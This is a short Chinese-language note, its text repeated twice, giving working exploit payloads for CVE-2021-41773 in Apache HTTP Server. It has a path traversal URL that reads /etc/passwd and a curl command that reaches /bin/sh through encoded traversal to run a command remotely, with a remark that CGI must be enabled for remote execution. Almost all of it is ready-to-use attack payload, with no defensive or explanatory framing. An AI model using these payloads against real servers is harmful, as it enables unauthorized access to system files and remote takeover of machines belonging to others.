CVE-2021-41773
poc: /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
但是近期国外的师傅研究出了直接RCE的方法,Payload如下:
curl --data "A=|id>/tmp/x" 'URL/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh' -vv
如果想要进行RCE的话就要开启CGI。
CVE-2021-41773
poc: /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
但是近期国外的师傅研究出了直接RCE的方法,Payload如下:
curl --data "A=|id>/tmp/x" 'URL/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh' -vv
如果想要进行RCE的话就要开启CGI。